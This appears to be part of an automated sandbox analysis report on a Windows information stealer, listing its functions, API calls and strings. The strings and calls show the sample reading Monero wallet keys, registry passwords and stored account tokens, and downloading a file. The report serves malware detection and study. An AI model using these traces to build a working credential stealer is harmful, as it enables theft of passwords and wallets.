Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A

DeleteFileA.KERNEL32(00000000), ref: 009214EF

Strings

\Monero\wallet.keys, xrefs: 0092138D
SOFTWARE\monero-project\monero-core, xrefs: 00921335
wallet_path, xrefs: 00921330
.keys, xrefs: 0092136B

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 391169f199fed52a2aa69b5c7d57dbc47a71d229f6980ebe30e0ecaaa6c815b1
Instruction ID: 7dcdb756907f2fcfb76312e5d3e27429dc8a47c1bd969dd80c5dfe8f3c6cef27
Opcode Fuzzy Hash: 391169f199fed52a2aa69b5c7d57dbc47a71d229f6980ebe30e0ecaaa6c815b1
Instruction Fuzzy Hash: 1A5133B1D5011967CB15FB60DD92FEE737CAF94300F4041E8B64AA2091EE746B89CFA6

Function 00937500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00937542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937603
RtlAllocateHeap.NTDLL(00000000), ref: 0093760A
wsprintfA.USER32 ref: 00937640

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Strings

C, xrefs: 0093754C
\, xrefs: 00937560
@o, xrefs: 00937635
:, xrefs: 0093755C

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$@o$C$\
API String ID: 1544550907-3324255715
Opcode ID: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
Instruction ID: e8a04ac7dd2942d874706694db54eff586b009d648213aa86ebce72fdc8d63e0
Opcode Fuzzy Hash: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
Instruction Fuzzy Hash: 2B417EB1D04248ABDF20DB94DC95BEEBBB8AB48704F100199F509672C0DB78AA44CFA5

Function 009275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009272D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0092733A
Part of subcall function 009272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
Part of subcall function 009272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
Part of subcall function 009272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
Part of subcall function 009272D0: HeapFree.KERNEL32(00000000), ref: 00927459

lstrcat.KERNEL32(3567D020,009417FC), ref: 00927606
lstrcat.KERNEL32(3567D020,00000000), ref: 00927648
lstrcat.KERNEL32(3567D020, : ), ref: 0092765A
lstrcat.KERNEL32(3567D020,00000000), ref: 0092768F
lstrcat.KERNEL32(3567D020,00941804), ref: 009276A0
lstrcat.KERNEL32(3567D020,00000000), ref: 009276D3
lstrcat.KERNEL32(3567D020,00941808), ref: 009276ED
task.LIBCPMTD ref: 009276FB

Strings

: , xrefs: 0092764E

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
Instruction ID: 07aa1f3872dc9d0d4db247de71d11f079a3960edae21e423330d69a5a9ba0635
Opcode Fuzzy Hash: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
Instruction Fuzzy Hash: 5A316972901109EBCF04EBE4EC86EEFB778AB85305B104418E102B72A5DE78A946CF52

Function 009260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

InternetOpenA.WININET(00940DF7,00000001,00000000,00000000,00000000), ref: 0092610F
StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00926147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0092618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009261B3
InternetReadFile.WININET(?,?,00000400,?), ref: 009261DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0092620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00926249
InternetCloseHandle.WININET(?), ref: 00926253
InternetCloseHandle.WININET(00000000), ref: 00926260

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 44d2a707553e9fbb44f714a11be4b96255f70109e99d834e5cb96ddc18a150d7
Instruction ID: 409a663e3c9ec6c5dc32323ed19ec11e197677971d1b6925dc72451291623d13
Opcode Fuzzy Hash: 44d2a707553e9fbb44f714a11be4b96255f70109e99d834e5cb96ddc18a150d7
Instruction Fuzzy Hash: 79512CB1900218ABDF20DF60DC45BEE77B8EB44705F108498E605A71C5DBB8AA89CF95

Function 009272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0092733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
HeapFree.KERNEL32(00000000), ref: 00927459
task.LIBCPMTD ref: 00927555

Strings

Password, xrefs: 00927401

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
Instruction ID: e6de044b75732f80be57a5abcaf35accde1823a0a9199a8c647e3112b93b97f8
Opcode Fuzzy Hash: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
Instruction Fuzzy Hash: 4B612CB59041689BDB24DB50DC51FDAB7B8BF84300F0081E9E649A6185DFB45FC9CF90

Function 009340B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,006FDC50,00000000,00020119,?), ref: 009340F4
RegQueryValueExA.ADVAPI32(?,006FDF80,00000000,00000000,00000000,000000FF), ref: 00934118
RegCloseKey.ADVAPI32(?), ref: 00934122
lstrcat.KERNEL32(?,00000000), ref: 00934147
lstrcat.KERNEL32(?,006FDFC8), ref: 0093415B

Strings

@o, xrefs: 00934233
8o, xrefs: 0093418B

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID: 8o$@o
API String ID: 690832082-2426529385
Opcode ID: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
Instruction ID: c36713559e266aa81ceec45b1eee345cd2c64a03f3272ecc32e079c30a51b1c6
Opcode Fuzzy Hash: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
Instruction Fuzzy Hash: 5F4148B69101086BDF24EBA0EC56FFE737DAB98300F404558B616571C1EEB95B888FD2

Function 0092BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

lstrlen.KERNEL32(00000000), ref: 0092BC9F

Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0092BCCD
lstrlen.KERNEL32(00000000), ref: 0092BDA5
lstrlen.KERNEL32(00000000), ref: 0092BDB9

Strings

AccountTokens, xrefs: 0092BB49
AccountTokens, xrefs: 0092BABA
SELECT service, encrypted_token FROM token_service, xrefs: 0092BBEB
AccountId, xrefs: 0092BCC4

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
